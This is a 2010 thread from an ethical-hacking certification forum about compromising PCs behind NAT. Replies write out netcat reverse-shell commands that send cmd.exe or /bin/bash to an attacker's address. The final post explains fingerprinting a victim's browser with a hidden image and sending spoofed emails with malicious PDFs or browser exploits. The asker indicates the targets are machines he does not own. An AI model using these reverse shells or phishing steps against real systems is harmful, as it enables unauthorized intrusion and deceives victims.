.

how to penetrate pc through NAT ??

<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Thu Apr 22, 2010 3:54 pm

how to penetrate pc through NAT ??

i'll suppose i have 4 pc's in my network and ofcourse using NAT protocol to translate all my 4 addresses to 1 Puplic ip

well the Question is is there any chance to penetrate my network through NAT ?

and how to do it ?
<<

kriscamaro68

User avatar

Jr. Member
Jr. Member

Posts: 61

Joined: Thu Mar 11, 2010 2:48 pm

Post Thu Apr 22, 2010 4:00 pm

Re: how to penetrate pc through NAT ??

rebrov wrote:i'll suppose i have 4 pc's in my network and ofcourse using NAT protocol to translate all my 4 addresses to 1 Puplic ip

well the Question is is there any chance to penetrate my network through NAT ?

and how to do it ?


I would think it would be possible through a social engineering attack of sorts by sending the user an e-mail which they click that installs some sort of software or maybe has a link to a site that infects the computer. Other then that I wouldn't know cause I am still to new at this stuff. Maybe someone else could shed some more light on it.
A+, Net+, Server+, Security+, MCP/XP
<<

n1p

Jr. Member
Jr. Member

Posts: 89

Joined: Tue Mar 16, 2010 5:31 pm

Post Thu Apr 22, 2010 4:54 pm

Re: how to penetrate pc through NAT ??

Yes, you may need to initiate a connection from the internal network/PCs. However NAT routers may also have running services that can exploited (remote administration/ftp). They may also forward ports to services on the client PC that may be exploited.
<<

j0rDy

User avatar

Hero Member
Hero Member

Posts: 591

Joined: Tue Feb 23, 2010 4:55 am

Location: Netherlands

Post Fri Apr 23, 2010 2:19 am

Re: how to penetrate pc through NAT ??

attacks through a NAT is always done through a reverse connection cause of the fact you cannot connect directly to the machine in the network. like n1p said. if there are ports forwarded the attacker can connect to them directly...
CISSP, CEH, ECSA, OSCP, OSWP

earning my stripes appears to be a road i must travel alone...with a little help of EH.net
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Fri Apr 23, 2010 6:41 am

Re: how to penetrate pc through NAT ??

To add to what j0rDy mentioned, your system could also get compromised by surfing to malicious web sites (cross-site scripting).
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

unsupported

User avatar

Sr. Member
Sr. Member

Posts: 318

Joined: Sun Feb 08, 2009 3:38 pm

Location: 407

Post Fri Apr 23, 2010 7:48 am

Re: how to penetrate pc through NAT ??

For your scenario, you can shovel a shell/reverse shell using NetCat.  How do you get NetCat on the machine from the outside?  It is so small it can fit inside a buffer overflow or you can combine it with another executable which is run on the inside.
-Un
CISSP, GCIH, GCIA, C|EH, Sec+, Net+, MCP
<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Thu May 13, 2010 8:19 pm

Re: how to penetrate pc through NAT ??

yes thats right only way to use reverse telnet ot reverse trojan ,,, a connect back trojan is that right ?

but how to use a reverse telnet connection to the target in case i can deliver the netcat to the target !?
<<

Xen

User avatar

Sr. Member
Sr. Member

Posts: 386

Joined: Tue Feb 03, 2009 3:59 am

Post Thu May 13, 2010 10:03 pm

Re: how to penetrate pc through NAT ??

After you install netcat on the target machine you can create a reverse shell on the target machine that will connect to you.
Firstly, you must  have a netacat listener running on your machine.
  Code:
Command:
nc -l -p <port you want netcat to listen on>


Then you make a reverse shell from the target machine connect to you.
  Code:
For windows target:
nc <your I.P address> <your open port> -e cmd.exe


  Code:
For Linux target:
nc <your I.P address> <your open port> -e /bin/bash
Last edited by Xen on Thu May 13, 2010 10:05 pm, edited 1 time in total.
<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Thu May 13, 2010 11:22 pm

Re: how to penetrate pc through NAT ??

Equix3n- wrote:After you install netcat on the target machine you can create a reverse shell on the target machine that will connect to you.
Firstly, you must  have a netacat listener running on your machine.
  Code:
Command:
nc -l -p <port you want netcat to listen on>


Then you make a reverse shell from the target machine connect to you.
  Code:
For windows target:
nc <your I.P address> <your open port> -e cmd.exe


  Code:
For Linux target:
nc <your I.P address> <your open port> -e /bin/bash






thats working only when u have physical access on the 2 machines right ?

and also i think u have to use kinda no-ip service if the 2 machines behind NAT right ??

but what if u dont have physical access to the machine its a penetrating not negotiating with 2 machines u own u got wat i mean ?
<<

Xen

User avatar

Sr. Member
Sr. Member

Posts: 386

Joined: Tue Feb 03, 2009 3:59 am

Post Fri May 14, 2010 1:47 am

Re: how to penetrate pc through NAT ??

You don't have to have physical access to these machine to launch a reverse shell. You can try for client side exploits and get the shell. It's all done remotely.
<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Sat May 15, 2010 5:34 am

Re: how to penetrate pc through NAT ??

Equix3n- wrote:You don't have to have physical access to these machine to launch a reverse shell. You can try for client side exploits and get the shell. It's all done remotely.


exploits ? what do u mean i can't exploit it yet cuz its natted !!

how can i exploit it if its natted in the first place ?
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Sat May 15, 2010 7:08 am

Re: how to penetrate pc through NAT ??

@rebrov -

To exploit a machine by NAT, you will have to get the remote user to access a malicious webpage, send an email that deceives them into opening a malicious attachment, or otherwise find a way to manipulate the remote user into executing code to create your reverse shell or otherwise give you access.  That's why they said "You can try for client side exploits..."  You need to find some vulnerability on the client machine that either auto-executes malicious code, or tricks the user into running it, so you can gain access.  Aside of those, unless you gain physical access to a machine behind the NAT, and run code yourself, there won't be a way to exploit the clients behind NAT, as you cannot directly connect to them from outside, without a reverse shell.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

Xen

User avatar

Sr. Member
Sr. Member

Posts: 386

Joined: Tue Feb 03, 2009 3:59 am

Post Sat May 15, 2010 8:36 am

Re: how to penetrate pc through NAT ??

The goal of client-side exploits is to make the victim initiate an outbound connection to you. Here we try to exploit the applications installed on the victim's computer. The only drawback of this method is that you've to rely on the victim to access your machines or run your code. Furthermore you've to guess what software the victim might be running.
You've a server that serves exploits to the client machines connecting to it. You send a script/URL to the victim which makes the appropriate client machine to connect to the attacker's server. The server then exploits the client connecting to it.
For eg. suppose you know that a user is not very security conscious. He rarely update his system and is probably still using IE6. You send him a fake email which contains a link/script to your server that serves an appropriate IE6 exploit. When the user clicks on your URL and visits your server his browser is exploited to spawn a reverse shell to you.

As a side note, it will be good for you if you try to learn somethings from yourself too. I had already told you that client side exploits is the way to go here. You could have googled for client-side exploits which would've given you more detailed articles. Learning from a forum is only beneficial if you make some efforts from your side too. No one will spoon fed you, you can only be given pointers. I do not mean to discourage you from asking questions, you'll be helped in the future also, but want you to learn somethings yourself too.

Edit: I didn't mean to be rude. It's just that English isn't my primary language, so I may not have expressed my emotions clearly.
Last edited by Xen on Sat May 15, 2010 12:38 pm, edited 1 time in total.
<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Sat May 15, 2010 12:37 pm

Re: how to penetrate pc through NAT ??

Equix3n- wrote:The goal of client-side exploits is to make the victim initiate an outbound connection to you. Here we try to exploit the applications installed on the victim's computer. The only drawback of this method is that you've to rely on the victim to access your machines or run your code. Furthermore you've to guess what software the victim might be running.
You've a server that serves exploits to the client machines connecting to it. You send a script/URL to the victim which makes the appropriate client machine to connect to the attacker's server. The server then exploits the client connecting to it.
For eg. suppose you know that a user is not very security conscious. He rarely update his system and is probably still using IE6. You send him a fake email which contains a link/script to your server that serves an appropriate IE6 exploit. When the user clicks on your URL and visits your server his browser is exploited to spawn a reverse shell to you.

As a side note, it will be good for you if you try to learn somethings from yourself too. I had already told you that client side exploits is the way to go here. You could have googled for client-side exploits which would've given you more detailed articles. Learning from a forum is only beneficial if you make some efforts from your side too. No one will spoon fed you, you can only be given pointers. I do not mean to discourage you from asking questions, you'll be helped in the future also, but want you to learn somethings yourself too.



no no u were so Gentel guys and helpful from my side i will try to search more and learn more about client-side i'll tell u what im gonna get later thanks guys for information :)
<<

sil

User avatar

Hero Member
Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Sat May 15, 2010 12:58 pm

Re: how to penetrate pc through NAT ??

rebrov wrote:no no u were so Gentel guys and helpful from my side i will try to search more and learn more about client-side i'll tell u what im gonna get later thanks guys for information :)



Take a different approach here in understanding this from a non-technological perspective. This allows you to understand the concept more...

Technological approach
Client
Server

Non-tech approach
Client - someone paying you for something
Vendor (server) - someone offering a service

On the non-tech side, you as a vendor are providing say water. You'd like your client to buy (run software) water (exploit). How would you get the client to try your tasty water. Offer it to them for free. People like free.

Tech approach
Enumerate - either technically or socially - any potential services you think your client is running. Familiarize yourself somehow with his internals. Send them an email with an embedded picture:


  Code:
<img src=http://mysite.com/nonexistentimage.jpg height=0 width=0>


What does this do for you? If you're running your own webserver, you could check your logs to see the useragent on his browser. Say you see the following:

  Code:
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"


You now know whomever opened that email is using IE 6.0 to surf the Internet. How do you cause your client (that machine) to open something innocuously and run code? Search for something that could potentially affect his browser. The client would run code and open a shell to you given the right parameters.

Client side: What could that person be running inside their network? If I send them a loaded PDF would I get a shell. If I sent them a heapspraying IE exploit targeted at IE 6.0 would I be able to come OUT from them TO wherever I need them to connect to?

Can I social engineer them to open a loaded file for me? Enumerate THEIR clients and business partners. Send them a loaded PDF spoofing one of their clients, business partners, co-workers. Get them to open up something you've created to exploit the client side. The key is to get them to run something. Could be a variety of things, use your imagination. What would get YOU TO OPEN a file or check a website?
Next

Return to CEH - Certified Ethical Hacker

Who is online

Users browsing this forum: No registered users and 0 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software